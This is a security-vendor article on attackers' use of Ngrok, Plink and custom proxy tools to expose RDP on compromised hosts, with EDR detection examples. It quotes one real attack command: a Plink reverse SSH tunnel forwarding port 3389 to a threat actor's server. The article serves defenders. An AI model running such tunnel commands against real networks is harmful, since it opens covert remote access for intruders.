Proxy Tools Detected by AhnLab EDR

After gaining control over infected systems, threat actors may also perform remote screen control using RDP. This is partly for convenience but can also serve the purpose of maintaining persistence. If the RDP service is not active during the attack process, threat actors may install RDP Wrappers, steal existing account credentials, or create new backdoor accounts.

However, if the infected system exists within a private network (e.g., behind a NAT environment), remote desktop access from outside becomes impossible even if the IP and account credentials are known. To address this, threat actors often install proxy tools equipped with features that expose the system to external access.

Commonly used tools include Ngrok and Plink, but threat actors may also develop their own tools. For example, groups like Kimsuky and Andariel use self-developed proxy tools during their attacks to control infected systems remotely through RDP. This section covers the proxy tools used in actual attack processes and methods to detect them using AhnLab EDR.

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution, providing powerful threat monitoring, analysis, and response capabilities for endpoint areas based on Korea’s self-behavior-based engine. AhnLab EDR continuously collects information related to suspicious behaviors to allow the user to precisely perceive threats from a detection, analysis, and response perspective and identify causes, respond with appropriate measures, and establish processes to prevent threat recurrence.

Figure 1. AhnLab EDR

 

1. Ngrok

Ngrok is a tunneling tool that exposes systems within NAT environments to allow external access. It has been frequently used by the Kimsuky group in the past, but it is also utilized by the Andariel group and various other threat actors. Most commands identified in attack cases aim to expose port 3389, which is used for the RDP service, to the outside. [1] [2]

Figure 2. Ngrok used in attacks

The execution of Ngrok is identified as a threat by AhnLab EDR, enabling administrators to quickly detect and take action.

Figure 3. Detecting Ngrok execution behavior using AhnLab EDR

 

2. Plink

Plink is part of the PuTTY toolset and acts as a Secure Shell (SSH) client. It primarily operates via the command line and is used to establish SSH connections to remote servers or perform port forwarding. Although frequently used for legitimate purposes, its support for proxy features makes it susceptible to misuse by various APT groups and ransomware threat actors.

For instance, in a past attack involving the deployment of LockBit 3.0 ransomware, threat actors exploited Exchange Server vulnerabilities to gain initial access, installed a web shell, and then used a script to activate RDP and install Plink. Subsequently, Plink was executed with the following command to enable external RDP connections through SSH tunneling to the threat actor’s SSH server.

Command
C:\Temp\AUtempR\p64.exe [removed]@172.93.181[.]238 -pw [removed] -P 443 -2 -4 -T -N -C -R 0.0.0.0:10443:127.0.0.1:3389

Table 1. Command used in the attacks

AhnLab EDR identifies Plink activity as a critical behavior, enabling administrators to detect and respond early.

Figure 4. Detecting Plink execution behavior using AhnLab EDR

 

3. Other Proxy Tools

Threat actors often use known proxy tools, but they also frequently create their own. For example, in attack cases involving the Andariel group [3] [4] or Kimsuky group [5] [6] [7], new proxy tools are often identified. The following is a proxy tool identified in an attack case by the Andariel group, which is the same as the one used by the Lazarus group in 2021.

Figure 5. Proxy tool used by the Andariel Group

The commands used to execute proxy tools show that threat actors primarily use proxies to expose RDP services externally. Some proxy tools have port 3389 hardcoded, while others allow it to be passed as an argument as shown below, though the default port setting remains 3389 in many cases.

Figure 6. Kimsuky group’s proxy tool

AhnLab EDR detects suspicious behavior from proxy tools exposing RDP services externally, identifying them as threats. This enables administrators to detect and respond at an early stage.

Figure 7. Detecting suspicious proxy tools using AhnLab EDR

 

4. Conclusion

Recent cases of using RDP to control infected systems have been increasing. RDP is not only a major attack vector during initial access processes but is also utilized for maintaining persistence or remote screen control after infection. However, when the infected system exists within a NAT environment, there are limitations to external RDP access. Consequently, threat actors use known proxy tools or create custom tools to expose RDP services externally.

AhnLab EDR collects and displays information about the installation or execution of tools that can be used as proxies, enabling administrators to recognize and respond to suspicious activities. Furthermore, if suspicious proxy tools are installed, AhnLab EDR detects them as threats, assisting administrators in identifying the cause and establishing appropriate response and prevention processes.

 

Behavior Detection
– Execution/EDR.Ngrok.M11445
– Execution/EDR.Proxy.M12243
– Execution/DETECT.Plink.M12255